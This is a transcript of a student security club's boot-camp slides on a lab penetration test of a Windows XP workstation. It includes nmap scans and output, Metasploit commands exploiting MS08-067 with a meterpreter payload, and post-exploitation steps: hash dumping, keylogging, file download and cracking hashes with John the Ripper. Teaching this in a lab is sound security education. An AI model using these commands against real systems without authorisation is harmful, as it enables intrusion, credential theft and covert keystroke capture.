Presentation is loading. Please wait.

Presentation is loading. Please wait.

Penetration Testing 101 (Boot-camp)

Published byChastity Shields Modified over 8 years ago

Similar presentations

Presentation on theme: "Penetration Testing 101 (Boot-camp)"— Presentation transcript:

1 Penetration Testing 101 (Boot-camp)
Computer Security Group Mitchell Adair utdcsg.org

2 Outline “Interactive” meeting Introduction to Backtrack
A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

3 Scenario Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

4 Outline Enumeration Exploitation Post Exploitation
OS, services, versions, filters Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …

5 Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types -sS, Syn -sT, Connect -sA, Ack Options -O, OS -sV, services -v, verbose

6 … Enumeration nmap 192.168.1.1 nmap -v -sV -O 192.168.1.1 -p 1-65535
Default scan, full SYN, top 1000 ports nmap -v -sV -O p Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O Don't ping, run all smb* scripts, service, OS

7 Nmap Output Not shown: 996 closed ports
PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ | smb-check-vulns: |_ MS08-067: VULNERABLE

8 Exploitation Metasploit – Penetration Testing Framework
tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST set PAYLOAD windows/meterpreter/bind_tcp exploit

9 Post Exploitation Gather useful information Pivot
SSH & GPG keys, hashes, etc... Meterpreter “post” modules Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) download migrate shell

10 … Post Exploitation We dumped the hashes... now what? John the Ripper
Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

11 … Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt
Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: trying: SKIDOO - ZHONGGU

12 So... let's get started Boot up to your Backtrack CD passwd
/etc/init.d/networking start startx Follow along... let's pwn this box :)

13 Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

14 Resources utdcsg.org Nmap - nmap.org/5/ Metasploit - metasploit.com/
Presentations, articles, resources, etc. IRC irc.oftc.net, #utdcsg Nmap nmap.org/5/ Metasploit metasploit.com/ John the Ripper - openwall.com/john/

Download ppt "Penetration Testing 101 (Boot-camp)"

Similar presentations

Module XIV SQL Injection

Module XIV SQL Injection
By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.

By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Armitage and Metasploit Penetration Testing Lab

Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals

Computer Security Fundamentals
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.

© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.

CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.

Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Microsoft Baseline Security Analyzer INLS 187 Security Software Presentation by Hinár György Polczer

Microsoft Baseline Security Analyzer INLS 187 Security Software Presentation by Hinár György Polczer
1 GFI LANguard Network Security Scanner. 2 Contents Introduction Features Source & Installation Testing environment Results Conclusion.

1 GFI LANguard Network Security Scanner. 2 Contents Introduction Features Source & Installation Testing environment Results Conclusion.
Penetration Testing.

Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.

Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.

Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Similar presentations

Ads by Google